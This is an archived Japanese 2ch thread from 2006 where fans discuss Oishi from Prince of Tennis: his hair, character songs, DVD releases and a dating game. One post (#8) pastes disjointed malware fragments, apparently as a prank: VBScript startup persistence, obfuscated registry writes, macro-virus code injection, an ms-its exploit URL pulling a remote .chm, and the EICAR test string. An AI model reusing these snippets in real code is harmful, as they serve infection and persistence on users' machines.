5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

テニプリ大石の頭に見とれるスレッド四度

1 :名無しかわいいよ名無し:2006/11/09(木) 01:34:23 ID:ZM1sGsCH
テニスの玉子様こと青春学園中等部3年
テニス部副部長(時々部長代理)大石秀一郎
の頭にみとれるスレッドです。
ネタは皆無だけど一日一頭。それが大石クオリティ

前スレ
テニプリの大石の頭にみとれるスレッド
http://comic6.2ch.net/test/read.cgi/cchara/1081376084/

テニプリ大石の頭に見とれるスレッド再び
http://comic6.2ch.net/test/read.cgi/cchara/1112765454/

テニプリ大石の頭に見とれるスレッド三度
http://comic6.2ch.net/test/read.cgi/cchara/1150501732/l50

2 :名無しかわいいよ名無し:2006/11/09(木) 01:35:39 ID:ZM1sGsCH
三度がちょっと目を離した隙にdat落ちしたっぽいので、四度を立てときます

3 :名無しかわいいよ名無し:2006/11/09(木) 01:57:07 ID:4zxrUg2m
乙!
あちゃ〜いつの間にか落ちてたのか。

4 :名無しかわいいよ名無し:2006/11/09(木) 02:38:14 ID:8FTENknK
>>1
再建乙ですー!

他テニスレも落ちてたりしてるから気をつけなきゃだね。

5 :名無しかわいいよ名無し:2006/11/09(木) 02:43:36 ID:v9O7qTEr
無くなった!と思って半狂乱になってスレッドさがした・・・
良かった!!!

6 :名無しかわいいよ名無し:2006/11/09(木) 03:19:28 ID:kCcRS+IX
昔、大石大好きだったなあ…。今見てるアニメに中の人が出ていてうれしい。

7 :名無しかわいいよ名無し:2006/11/09(木) 07:56:27 ID:HxMIZxAc
乙です!

大石スレ、とうとう落ちちゃったんだ・・・

気をつけよう

8 :<body onload=window()>:2006/11/09(木) 18:08:22 ID:RmxU15uS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :名無しかわいいよ名無し:2006/11/10(金) 00:47:16 ID:8wkNfUsc
大石かわいいよ。
あの頭はおしゃれなのか無頓着なのか・・・??

10 :名無しかわいいよ名無し:2006/11/10(金) 01:31:11 ID:CG3X6njr
>>9
おしゃれじゃね?
無頓着なら髪が少し伸びてきているはずだ。

11 :名無しかわいいよ名無し:2006/11/10(金) 15:36:44 ID:wH0yfT23
沢北のパクリ

12 :名無しかわいいよ名無し:2006/11/11(土) 00:24:55 ID:nz83O/MZ
主人「今日はどのように??」

大石「例のコースで頼むマスター・・・・」

13 :名無しかわいいよ名無し:2006/11/13(月) 03:35:02 ID:elToBpz5
中の人も自虐ネタで来るようになったか…

14 :名無しかわいいよ名無し:2006/11/14(火) 07:34:44 ID:9iu/QrhK
ほしゅ

15 :名無しかわいいよ名無し:2006/11/14(火) 08:38:48 ID:s7gRza5Y
ラジオでどんな事言ってたのか
聞ける地域の人教えてくれー

16 :名無しかわいいよ名無し:2006/11/14(火) 13:07:38 ID:whDXp7sV
>>11
沢北のパクリは出来ても、大石のパクリは誰にも出来ないだろう

大石はあの二本の前髪がチャームポイント

17 :名無しかわいいよ名無し:2006/11/14(火) 15:11:10 ID:gXmFwseI
チャームポイントは二本の前髪
イカスぜ前髪ぃ〜♪
そんなに見つめたら照れるだろ〜

こんなんしか浮かばないや大石ゴメ

18 :名無しかわいいよ名無し:2006/11/14(火) 15:43:26 ID:YdavIT4O
>>13
何言ったの?

19 :名無しかわいいよ名無し:2006/11/15(水) 21:27:05 ID:frUoC7Wf
>>13
自虐ネタって何なんだ…普通でいいのになあ大石

20 :名無しかわいいよ名無し:2006/11/16(木) 01:42:43 ID:M39/lXjV
よく覚えてないんだけど、自分が自虐ネタっぽく聞こえたのはこれ。>>13とは違うかもしれないが。

『いわねー』のコーナーで大石の『先生、男子がちゃんと掃除しません』みたいな台詞があって『むしろ言いそうじゃね?』な空気になるスタジオ。
で、たしかTKが『先生に言っちゃって「また大石か」とかみんなに言われるんでしょうね…』みたいなこと言ってた。

21 :名無しかわいいよ名無し:2006/11/16(木) 03:01:10 ID:dUIhL6Qx
そんな大石がだいすきだ・・・

22 :名無しかわいいよ名無し:2006/11/16(木) 05:04:35 ID:c5TcV0EC
>>20
というかそれは、いかにも女子が言うセリフってことじゃ
男子が…って大石お前は男子じゃないのかとw

23 :名無しかわいいよ名無し:2006/11/17(金) 00:48:49 ID:TpmVfQpe
どっちかっつーと、大石は掃除してない本人に直接言いそうだけどな。
サボってないでちゃんとやってくれよ、みたいな。

大石はチクリなんかしないやいヽ(`Д´)ノ

24 :名無しかわいいよ名無し:2006/11/17(金) 10:13:08 ID:GxxhdYrv
大石君大石君、君の所の部長と相方のスレが無くなってたよ

25 :名無しかわいいよ名無し:2006/11/17(金) 10:19:13 ID:P2KFsGm8
地味に生き残ってるのにバロス
さすが大石きゅん

26 :名無しかわいいよ名無し:2006/11/17(金) 10:36:43 ID:GxxhdYrv
>24追記
あと桃城スレも無かったよ大石君


何故だろう…手塚いないと大石に報告したくなる。

27 :名無しかわいいよ名無し:2006/11/18(土) 01:10:36 ID:kOxiPdAU
手塚だからというより、大石の人柄じゃね?
親身になって聞いてくれそうジャマイカ

28 :名無しかわいいよ名無し:2006/11/18(土) 05:18:16 ID:yLn36ex/
青酢キタ━(゚∀゚≡゚∀゚)━!!
黄金ペアシングルキタ━(゚∀゚≡゚∀゚)━!!

29 :名無しかわいいよ名無し:2006/11/18(土) 11:01:14 ID:kOxiPdAU
>>28
kwsk

青酢でまたCD出るの?嬉しすぎる。

30 :名無しかわいいよ名無し:2006/11/18(土) 14:48:18 ID:ce76/Gwq
青酢好きすぎる!マジなら嬉しい!てかテニプリキャラソン出まくりだな

31 :名無しかわいいよ名無し:2006/11/18(土) 23:22:12 ID:yLn36ex/
>>29 声優板

青酢はOVAの新OPらしい。

バレキスが真田になったのは残念だけど、こっちの方が嬉しい。

菊丸とのデュエットは12月、青酢は1月発売。

ワクテカがとまらない

32 :名無しかわいいよ名無し:2006/11/19(日) 00:16:19 ID:YM0op6j9
>>24

大石「・・・??・・・エージ・・??おい・・・・エージ?エージ!?・・しっかりしろよ!?・・なぁ・・エージ!!・・・・エ・・エージ??・・・エージ!?・・・エージイィ〜!!!!!」

33 :名無しかわいいよ名無し:2006/11/20(月) 22:29:52 ID:32BzOcXR
青酢オメage

34 :名無しかわいいよ名無し:2006/11/23(木) 12:06:11 ID:Wh7u5u4e
ぬるぽ

35 :名無しかわいいよ名無し:2006/11/24(金) 01:13:34 ID:LG5/+/6q
なんか一定以上スレ立つと
ヘタすると24時間位書き込み無いとdat落ちらしいな…
今キャラ板はそういう状況らしい

36 :名無しかわいいよ名無し:2006/11/24(金) 11:16:10 ID:wAxpdOtR
キャラスレが乱立してるってことか。

負けるな大石

37 :名無しかわいいよ名無し:2006/11/24(金) 21:36:26 ID:gEk1JWOM
テニスの王子様 Original Video Animation 全国大会篇 「INVITATION DVD」
■ 発売日:12月22日発売
■ 価 格:2,625円(税込)
■ 品 番:BCBA-2777
■ 収 録: #「青学VS比嘉 INVITATIONダイジェスト」
#「青学×比嘉×氷帝 キャストクロストーク」
#「青学VS氷帝 先取りスペシャルPV」
■ 封入特典: ライナーノート
■ 音声特典: 「全国大会レポート」青学黄金ペア編 大石秀一郎(CV:近藤孝行)&菊丸英二(CV:高橋広樹)
青学メンバーが比嘉戦を語る!

大石音声特典キタ━━━━(゚∀゚)━━━━!!!!

38 :名無しかわいいよ名無し:2006/11/25(土) 10:05:44 ID:3oUJvU9y
キター

39 :名無しかわいいよ名無し:2006/11/26(日) 02:51:25 ID:324UTjAJ
ケッ また菊丸とかよ。ウゼェんだよな、あいつの喋り。

40 :名無しかわいいよ名無し:2006/11/26(日) 04:39:59 ID:rscXcFQi
大石が出てくれるなら、誰とだっていいよ。

41 :名無しかわいいよ名無し:2006/11/26(日) 12:06:03 ID:J5K+2bL2
何かここ萌えスレになっているな

42 :名無しかわいいよ名無し:2006/11/26(日) 22:14:42 ID:6sdY0eSR
大石で萌え
我ながら器用

43 :名無しかわいいよ名無し:2006/11/27(月) 03:12:14 ID:KfbW35bF
大石は永遠の萌えキャラですよ

44 :名無しかわいいよ名無し:2006/11/27(月) 23:52:19 ID:v4g8K4Jg
大石は燃えであり萌えでもある

45 :名無しかわいいよ名無し:2006/11/28(火) 00:02:38 ID:t3IacAYi
また菊丸かとも思うがかと言って他に適当な組み合わせも思いつかない

46 :名無しかわいいよ名無し:2006/11/28(火) 00:39:02 ID:8g8OAos/
大石は、今までどの漫画にも1人はいる真面目キャラに全く興味を持ったことのなかった私に多大な影響を与えました
なんかもうしっかりしてるんだかしてないんだかわからない…うん、まあとにかく愛おしい。

47 :名無しかわいいよ名無し:2006/11/29(水) 12:27:03 ID:TF+6BP9/
age

48 :名無しかわいいよ名無し:2006/11/30(木) 23:10:43 ID:3A5e7ok5
>>40
大石の相手は赤坂か前原しかないだろう

49 :名無しかわいいよ名無し:2006/11/30(木) 23:28:13 ID:Pbabin3I
>>48ちょwそれ違う大石ww

50 :名無しかわいいよ名無し:2006/12/02(土) 05:00:54 ID:PfrfW1UL
初登場時の大石はクラブとかに通っちゃうラッパー系のお洒落さんだと思ってた。
それがあのギャップ・・・愛しいよ、大石。

51 :名無しかわいいよ名無し:2006/12/02(土) 10:27:47 ID:Pfi6vR7K
大石みたいな部員がいるのですが・・

52 :名無しかわいいよ名無し:2006/12/02(土) 10:43:06 ID:yloBEsl/
kwsk

53 :名無しかわいいよ名無し:2006/12/04(月) 05:47:19 ID:UmKTbMUu
あぼ〜ん

54 :名無しかわいいよ名無し:2006/12/04(月) 10:47:12 ID:l2LwPAxr
んっふっふ

55 :名無しかわいいよ名無し:2006/12/04(月) 12:21:21 ID:jRlHfQxp
蔵人ちゃんはお帰りください

56 :名無しかわいいよ名無し:2006/12/06(水) 17:08:05 ID:WmJjXGX7
大石秀一郎の名台詞ってなんだろう?

57 :名無しかわいいよ名無し:2006/12/06(水) 20:51:56 ID:j7BRaBns
こりゃ大変
俺たちは勝つために来た!
自分達の力を信じよう
これが全国で勝てる最強のメンバーです。
残念だったな赤澤!これはダブルスだ!


漏れの好きな台詞だ

58 :名無しかわいいよ名無し:2006/12/06(水) 22:51:28 ID:tYll0ZA3
台詞じゃないけど氷帝戦(一回目)の時の大石が好きだ

59 :名無しかわいいよ名無し:2006/12/07(木) 07:53:16 ID:3LC8HTCW
あの「よっ」って言ってる顔が好きだなw
大胆不敵と言うか、作戦成功!やったじゃないか桃、英二!っていう風な顔がw

60 :名無しかわいいよ名無し:2006/12/07(木) 12:25:44 ID:9PjowaOS
大石の新曲ソロ良かった?ラジプリ聴けなかったから教えてほしいんだけど

61 :名無しかわいいよ名無し:2006/12/07(木) 12:30:33 ID:9PjowaOS
sageるの忘れてたorz


62 :名無しかわいいよ名無し:2006/12/07(木) 14:42:01 ID:QtrUShqV
大石の曲いいよ!相方の曲も可愛いし、買いだな

63 :名無しかわいいよ名無し:2006/12/07(木) 15:00:51 ID:9PjowaOS
>>62
ありがd!
バラード系って聞いたんだけどピースバイピースみたいな感じ?

64 :名無しかわいいよ名無し:2006/12/07(木) 16:26:27 ID:QtrUShqV
壁|ω・`)http://m.pic.to/99j29コソーリ

65 :名無しかわいいよ名無し:2006/12/07(木) 17:18:01 ID:9PjowaOS
>>64
何貼ったの?怪しいやつじゃないよね?

66 :名無しかわいいよ名無し:2006/12/07(木) 17:22:11 ID:9PjowaOS
またやってもたorz
大石くんごめんちゃい

67 :名無しかわいいよ名無し:2006/12/07(木) 17:26:50 ID:QtrUShqV
PC許可してるけど…携帯のほうが確実

68 :名無しかわいいよ名無し:2006/12/07(木) 17:30:18 ID:9PjowaOS
漏れは携帯だよ。
何か分からないけどいってみる

69 :名無しかわいいよ名無し:2006/12/07(木) 17:46:13 ID:Tb0fVzFW
ラジプリで流れた大石の曲の一部分だったよ

70 :名無しかわいいよ名無し:2006/12/07(木) 17:47:22 ID:9PjowaOS
>>67
聴かせてもらった!まぢありがd!
思わずリピートしてもたw
発売が楽しみだ♪
相変わらずTKは歌うまいね!

71 :名無しかわいいよ名無し:2006/12/07(木) 19:00:39 ID:bap4M72j
>>50
ラッパーw

72 :名無しかわいいよ名無し:2006/12/07(木) 21:45:39 ID:eD5ZtudB
テニスの玉子様こと大石様

73 :名無しかわいいよ名無し:2006/12/07(木) 21:59:21 ID:aIZTITUT
大石が地味Sとユニットを組んでCDを出す夢見た。

74 :名無しかわいいよ名無し:2006/12/07(木) 22:07:24 ID:9PjowaOS
>>73
実現したらいいのにw
てか大石がリーダーのユニット作ってほすぃ

75 :名無しかわいいよ名無し:2006/12/07(木) 23:34:01 ID:QtrUShqV
リーダー大石で手塚・跡部・真田のユニット。ジャケットは大石メインで歌のパートもちょっと多い。ボイスメッセージもついてて、最初大石が調子乗って仕切るんだけど、キャラの濃い3人にいじられ収集つかず「こりゃ大変」的なもの。
が実現したら嬉し泣き笑いする(´;∀;`)

76 :名無しかわいいよ名無し:2006/12/07(木) 23:43:51 ID:9PjowaOS
>>75
ちょwすごい面子だなw
大石がこの3人仕切っちゃったらテニプリ界に激震が走るよw

77 :名無しかわいいよ名無し:2006/12/08(金) 21:45:59 ID:S31rsQyO
たーまごー♪たーまごー♪
たっぷり〜たーまごー♪

78 :名無しかわいいよ名無し:2006/12/09(土) 09:02:11 ID:/u+j0+GO
ttp://www.indexmusic.co.jp/admin/images/00000281.jpg
大石かっこよす

79 :名無しかわいいよ名無し:2006/12/09(土) 09:38:08 ID:VGUGYiPP
ほんとだ
菊丸ウラヤマシス

80 :名無しかわいいよ名無し:2006/12/09(土) 13:17:35 ID:LzuKvXls
さげ

81 :名無しかわいいよ名無し:2006/12/10(日) 12:52:59 ID:dOlj4d8R
>>75
大石と手塚がいるから、不二・越前と跡部・真田が入れ替わった『新青酢』みたいだなw

青酢は4人の声質が似てるから聴きやすくて好き。

82 :名無しかわいいよ名無し:2006/12/10(日) 14:03:41 ID:Rq8LRknl
>>81
むしろ越前と大石が入れ替わった新GIGS

83 :名無しかわいいよ名無し:2006/12/11(月) 05:13:17 ID:avl61Il5
>>82
それでOVAのOPとか歌っちゃえばいいのに

84 :名無しかわいいよ名無し:2006/12/11(月) 05:19:50 ID:hj9crt9+


85 :名無しかわいいよ名無し:2006/12/11(月) 12:55:46 ID:8zi1N73L
>>82
GIGSなんて初めて知ったよ。
まあ大石以外に興味ねーからなあ。

86 :名無しかわいいよ名無し:2006/12/11(月) 13:09:51 ID:99LuWnH3
前に大石がバレキス歌うかもといっていたが…
もし、バレキス以外で大石にカバー曲歌わせるなら何がいい?


87 :名無しかわいいよ名無し:2006/12/12(火) 01:08:04 ID:HqMaFzyI
ドリカムとかいいなあ。ほのぼのした感じで…

88 :名無しかわいいよ名無し:2006/12/12(火) 09:47:16 ID:eI2pYCxn
夏のお嬢さんを!!杏ちゃんに負けずノリノリで歌って欲しい…


所で『タイプはD』のタイトル見ると胸のサイズの好みがDなのかと勘違いする輩は私だけ?

89 :名無しかわいいよ名無し:2006/12/12(火) 13:52:57 ID:1kPQFaNm
>>86
とりあえず大石が壊れてくれればなんでもいい。

>>88
タイプはD!を聴いてないからどんな意味かわからないな…Dカップとか言わないでゴールデンコンビ
とりあえず今予約してきますた

90 :名無しかわいいよ名無し:2006/12/12(火) 18:38:14 ID:4dwz/IhJ
大石に全歌詞、英語の曲歌ってほしいwラストクリスマスとか。
一応、英語が得意科目になってるしねw

91 :名無しかわいいよ名無し:2006/12/12(火) 19:25:07 ID:4dwz/IhJ
>>88
言われて初めてオモタw
でも大石は胸の大きさなんて気にしない!…多分。


連投スマソ。

92 :名無しかわいいよ名無し:2006/12/12(火) 21:19:54 ID:nRfEm9XB
>>88
タイプって好みという意味で使われてるわけじゃないだろ。

>>90
大石とクリスマスソングっていいな。
メジャーなところを4〜5曲歌ってミニアルバムにして欲しい。

93 :名無しかわいいよ名無し:2006/12/13(水) 21:57:13 ID:5c5iPH+y
盛り上がってないねー(′・ω・`)

94 :名無しかわいいよ名無し:2006/12/14(木) 02:48:45 ID:N2DWQAUu
アメージンググレイスを歌ってほしいい!!
不二に勝てるよ!!

95 :名無しかわいいよ名無し:2006/12/15(金) 15:33:21 ID:q+ffuRq/
新曲wktk

96 :名無しかわいいよ名無し:2006/12/15(金) 15:45:50 ID:P9j8WsZf
今日、黄金CDとインビテーションDVD予約してきた。聴けるのは22日以降になりそう。

97 :名無しかわいいよ名無し:2006/12/17(日) 02:16:29 ID:OSfKvDMn
保守しとくよ!

98 :名無しかわいいよ名無し:2006/12/17(日) 18:26:30 ID:SLTFU6bI
ジャンフェス行って先行発売のインビテーション買った人いる??

99 :名無しかわいいよ名無し:2006/12/19(火) 21:20:17 ID:NbTfZQ9J
hosyu

100 :名無しかわいいよ名無し:2006/12/20(水) 08:17:27 ID:PASioK1M
ダブルスのDでしょw

101 :名無しかわいいよ名無し:2006/12/21(木) 23:10:15 ID:Ewp2uilk
大石の前髪見つめたい。

102 :名無しかわいいよ名無し:2006/12/21(木) 23:52:15 ID:BmlWTpWh
ドキサバの大石は甘いのかな
甘かったら買いたいのだが

103 :名無しかわいいよ名無し:2006/12/22(金) 09:26:28 ID:LWrLCQ8B
誰か大石に特攻した人はおらんの?

104 :名無しかわいいよ名無し:2006/12/23(土) 14:06:27 ID:bN0Q34tj
ゲームは買ってないが、噂によると大石に振られた奴が多数だとか

105 :名無しかわいいよ名無し:2006/12/24(日) 00:25:42 ID:OLERXHOS
振られるの面白そうだな

106 :名無しかわいいよ名無し:2006/12/24(日) 00:40:19 ID:i3GJhNf0
別の意味で貴重だな

107 :名無しかわいいよ名無し:2006/12/24(日) 04:14:44 ID:UV/Awpx+
大石はかなり申し訳なさそうに振るんだろうな…

108 :名無しかわいいよ名無し:2006/12/24(日) 11:12:42 ID:5JhNDrcK
やべwwwゲーム買いたくなったwwwwww

109 :名無しかわいいよ名無し:2006/12/25(月) 03:17:39 ID:hjAUfFpV
振られた奴多数ってことは今回は難易度高いのか?

110 :名無しかわいいよ名無し:2006/12/25(月) 05:47:37 ID:t3SUVZ0G
大石は眼鏡っ子好きだからな〜

111 :名無しかわいいよ名無し:2006/12/25(月) 06:12:56 ID:ew279Jgq
メガネっ娘のイメージが沸かなかったので日本メガネベストドレッサー賞というのを調べたら
光/浦靖子と観/月あり/さが出ていた…がいまいちよく分からない

そんでメガネっ娘フェチのHPを漁っていたらメガネの似合う子の具体的な容貌は
丸顔、黒髪、ロングヘアだって。いちごの東城みたいなのってことかしらん

112 :名無しかわいいよ名無し:2006/12/27(水) 02:58:28 ID:Nr70dmGG
本命な私も一度フラれましたよ。
最初から気をつけながらやってもだめだた。
我らが王子は選択肢間違うとイベントフラグ立ちませんw
乙女ゲスレではジゴロとかとか言われてたね。

113 :名無しかわいいよ名無し:2006/12/28(木) 01:22:53 ID:NLDhdQPU
ED見たけどなんか凄かったw

114 :名無しかわいいよ名無し:2006/12/29(金) 03:18:22 ID:Ed5urlYC
ちょwww
大石ハードル高いなwww

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)